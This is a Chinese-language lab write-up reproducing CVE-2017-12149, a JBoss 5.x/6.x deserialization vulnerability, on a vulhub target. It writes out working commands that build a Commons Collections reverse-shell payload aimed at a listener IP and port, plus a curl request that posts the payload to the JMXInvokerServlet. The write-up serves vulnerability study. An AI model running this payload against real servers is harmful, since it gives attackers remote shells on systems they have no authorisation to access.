CVE-2017-12149 JBoss 5.x6.x 反序列化漏洞
0X00-引言
淦,今天工作量拉满,累死了
0X01-环境搭建
靶机:CentOS Linux 7
攻击机:windows server 2016 && Kail
环境:vulhub
项目地址:https://github.com/vulhub/vulhub
搭建vulhub请访问:空白centos7 64 搭建vulhub(详细)
0X02-环境描述
该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。
影响版本:
JbossAS 5.x
JbossAS 6.x
0X03-漏洞复现
01-验证
http://192.168.234.128:8080/invoker/readonly
02-重定向到ReverseShellCommonsCollectionsHashMap.ser
文件
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.234.135:888 #填写监听机IP和port
curl http://192.168.234.128:8080//invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser #提交二进制数据
03-反弹shell
0X04-工具检测
工具下载:https://github.com/s0k/Deserialize
0X05-免责声明
仅供学习参考